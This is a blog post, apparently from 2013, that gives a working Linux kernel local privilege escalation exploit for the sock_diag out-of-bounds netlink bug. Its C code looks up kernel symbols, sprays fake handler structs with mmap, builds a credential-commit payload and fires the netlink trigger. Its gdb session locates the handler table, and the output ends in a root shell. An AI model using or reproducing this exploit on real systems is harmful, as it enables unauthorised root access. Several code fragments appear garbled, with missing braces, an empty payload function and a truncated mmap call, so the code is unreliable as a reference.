Julius Plenz – Blog

Privilege Escalation Kernel Exploit

So my friend Nico tweeted that there is an „easy linux kernel privilege escalation“ and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some russians have already had an exploit for several months, and there seem to be several similar versions flying around the net, I discovered later. They differ in technique and reliability, and I guess others can do better than me.

I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:

Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.

So we should do exactly that! One of the hardest parts was actually finding out how to send such a NetLink message, but I’ll come to that later. Let’s first have a look at the code that was patched (this is from net/core/sock_diag.c):

static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
    int err;
    struct sock_diag_req *req = nlmsg_data(nlh);
    const struct sock_diag_handler *hndl;

    if (nlmsg_len(nlh) < sizeof(*req))
        return -EINVAL;

    /* check for "req->sdiag_family >= AF_MAX" goes here */

    hndl = sock_diag_lock_handler(req->sdiag_family);
    if (hndl == NULL)
        err = -ENOENT;
        err = hndl->dump(skb, nlh);

    return err;

The function sock_diag_lock_handler() locks a mutex and effectively returns sock_diag_handlers[req->sdiag_family], i.e. the unsanitized family number received in the NetLink request. Since AF_MAX is 40, we can effectively return memory from after the end of sock_diag_handlers (“out-of-bounds access”) if we specify a family greater or equal to 40. This memory is accessed as a

struct sock_diag_handler {
    __u8 family;
    int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);

… and err = hndl->dump(skb, nlh); calls the function pointed to in the dump field.

So we know: The Kernel follows a pointer to a sock_diag_handler struct, and calls the function stored there. If we find some suitable and (more or less) predictable value after the end of the array, then we might store a specially crafted struct at the referenced address that contains a pointer to some code that will escalate the privileges of the current process. The main function looks like this:

int main(int argc, char **argv)
    spray_fake_handler((void *)0x0000000000010000);
    return execv("/bin/sh", (char *[]) { "sh", NULL });

First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.

/* privilege escalation code */
#define KERNCALL __attribute__((regparm(3)))
void * (*prepare_kernel_cred)(void *) KERNCALL;
void * (*commit_creds)(void *) KERNCALL;

/* match the signature of a sock_diag_handler dumper function */
int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)
    return 0;

/* look up an exported Kernel symbol */
void *findksym(const char *sym)
    void *p, *ret;
    FILE *fp;
    char s[1024];
    size_t sym_len = strlen(sym);

    fp = fopen("/proc/kallsyms", "r");
        err(-1, "cannot open kallsyms: fopen");

    ret = NULL;
    while(fscanf(fp, "%p %*c %1024s\n", &p, s) == 2) {
        if(!!strncmp(sym, s, sym_len))
        ret = p;
    return ret;

void prepare_privesc_code(void)
    prepare_kernel_cred = findksym("prepare_kernel_cred");
    commit_creds = findksym("commit_creds");

This is pretty standard, and you’ll find many variations of that in different exloits.

Now we spray a struct containing this function pointer over a sizable amount of memory:

void spray_fake_handler(const void *addr)
    void *pp;
    int po;

    /* align to page boundary */
    pp = (void *) ((ulong)addr & ~0xfffULL);

    pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
    if(pp == MAP_FAILED)
        err(-1, "mmap");

    struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };
    for(po = 0; po < 0x10000; po += sizeof(hndl))
        memcpy(pp + po, &hndl, sizeof(hndl));

The memory is mapped with MAP_FIXED, which makes mmap() take the memory location as the de facto location, not merely a hint. The location must be a multiple of the page size (which is 4096 or 0x1000 by default), and on most modern systems you cannot map the zero-page (or other low pages), consult sysctl vm.mmap_min_addr for this. (This is to foil attempts to map code to the zero-page to take advantage of a Kernel NULL pointer derefence.)

Now for the actual trigger. To get an idea of what we can do, we should first inspect what comes after the sock_diag_handlers array in the currently running Kernel (this is only possible with root permissions). Since the array is static to that file, we cannot look up the symbol. Instead, we look up the address of a function that accesses said array, sock_diag_register():

$ grep -w sock_diag_register /proc/kallsyms
ffffffff812b6aa2 T sock_diag_register

If this returns all zeroes, try grepping in /boot/System.map-$(uname -r) instead. Then disassemble the function. I annotated the relevant points with the corresponding C code:

$ sudo gdb -c /proc/kcore
(gdb) x/23i 0xffffffff812b6aa2
0xffffffff812b6aa2:  push   %rbp
0xffffffff812b6aa3:  mov    %rdi,%rbp
0xffffffff812b6aa6:  push   %rbx
0xffffffff812b6aa7:  push   %rcx
0xffffffff812b6aa8:  cmpb   $0x27,(%rdi)                ; if (hndl->family >= AF_MAX)
0xffffffff812b6aab:  ja     0xffffffff812b6ae5
0xffffffff812b6aad:  mov    $0xffffffff81668c20,%rdi
0xffffffff812b6ab4:  mov    $0xfffffff0,%ebx
0xffffffff812b6ab9:  callq  0xffffffff813628ee          ; mutex_lock(&sock_diag_table_mutex);
0xffffffff812b6abe:  movzbl 0x0(%rbp),%eax
0xffffffff812b6ac2:  cmpq   $0x0,-0x7e7fe930(,%rax,8)   ; if (sock_diag_handlers[hndl->family])
0xffffffff812b6acb:  jne    0xffffffff812b6ad7
0xffffffff812b6acd:  mov    %rbp,-0x7e7fe930(,%rax,8)   ; sock_diag_handlers[hndl->family] = hndl;
0xffffffff812b6ad5:  xor    %ebx,%ebx
0xffffffff812b6ad7:  mov    $0xffffffff81668c20,%rdi
0xffffffff812b6ade:  callq  0xffffffff813628db
0xffffffff812b6ae3:  jmp    0xffffffff812b6aea
0xffffffff812b6ae5:  mov    $0xffffffea,%ebx
0xffffffff812b6aea:  pop    %rdx
0xffffffff812b6aeb:  mov    %ebx,%eax
0xffffffff812b6aed:  pop    %rbx
0xffffffff812b6aee:  pop    %rbp
0xffffffff812b6aef:  retq

The syntax cmpq $0x0,-0x7e7fe930(,%rax,8) means: check if the value at the address -0x7e7fe930 (which is a shorthand for 0xffffffff818016d0 on my system) plus 8 times %rax is zero – eight being the size of a pointer on a 64-bit system, and %rax the address of the first argument to the function, but at the same time, if you only take one 64-bit-slice, the first member of the (not packed) struct, i.e. the family field. So this line is an array access, and we know that sock_diag_handlers is located at -0x7e7fe930.

(All these steps can actually be done without root permissions: You can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r) && dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux and start GDB on the resulting ELF file. Only now you actually need to inspect the main memory.)

(gdb) x/46xg -0x7e7fe930
0xffffffff818016d0:     0x0000000000000000      0x0000000000000000
0xffffffff818016e0:     0x0000000000000000      0x0000000000000000
0xffffffff818016f0:     0x0000000000000000      0x0000000000000000
0xffffffff81801700:     0x0000000000000000      0x0000000000000000
0xffffffff81801710:     0x0000000000000000      0x0000000000000000
0xffffffff81801720:     0x0000000000000000      0x0000000000000000
0xffffffff81801730:     0x0000000000000000      0x0000000000000000
0xffffffff81801740:     0x0000000000000000      0x0000000000000000
0xffffffff81801750:     0x0000000000000000      0x0000000000000000
0xffffffff81801760:     0x0000000000000000      0x0000000000000000
0xffffffff81801770:     0x0000000000000000      0x0000000000000000
0xffffffff81801780:     0x0000000000000000      0x0000000000000000
0xffffffff81801790:     0x0000000000000000      0x0000000000000000
0xffffffff818017a0:     0x0000000000000000      0x0000000000000000
0xffffffff818017b0:     0x0000000000000000      0x0000000000000000
0xffffffff818017c0:     0x0000000000000000      0x0000000000000000
0xffffffff818017d0:     0x0000000000000000      0x0000000000000000
0xffffffff818017e0:     0x0000000000000000      0x0000000000000000
0xffffffff818017f0:     0x0000000000000000      0x0000000000000000
0xffffffff81801800:     0x0000000000000000      0x0000000000000000
0xffffffff81801810:     0x0000000000000000      0x0000000000000000
0xffffffff81801820:     0x000000000000000a      0x0000000000017570
0xffffffff81801830:     0xffffffff8135a666      0xffffffff816740a0

(gdb) p (0xffffffff81801828- -0x7e7fe930)/8
$1 = 43

So now I know that in the Kernel I’m currently running, at the current moment, sock_diag_handlers[43] is 0x0000000000017570, which is a low address, but hopefully not too low. (Nico reported 0x17670, and a current grml live cd in KVM has 0x17470 there.) So we need to send a NetLink message with SOCK_DIAG_BY_FAMILY type set in the header, flags at least NLM_F_REQUEST and the family set to 43. This is what the trigger does:

void trigger(void)
    int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);
    if (nl < 0)
        err(-1, "socket");

    struct {
        struct nlmsghdr hdr;
        struct sock_diag_req r;
    } req;

    memset(&req, 0, sizeof(req));
    req.hdr.nlmsg_len = sizeof(req);
    req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.hdr.nlmsg_flags = NLM_F_REQUEST;
    req.r.sdiag_family = 43; /* guess right offset */

    if(send(nl, &req, sizeof(req), 0) < 0)
        err(-1, "send");

All done! Compiling might be difficult, since you need Kernel struct definitions. I used -idirafter and my Kernel headers.

$ make
gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c
$ ./kex
# id
uid=0(root) gid=0(root) groups=0(root)

Note: If something goes wrong, you’ll get a “general protection fault: 0000 [#1] SMP” that looks scary like this:

But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…

Update: The Protection Fault occurs when first following a bogous function pointer. After that, the exploit cannot longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)

posted 2013-02-26 tagged linux, c and security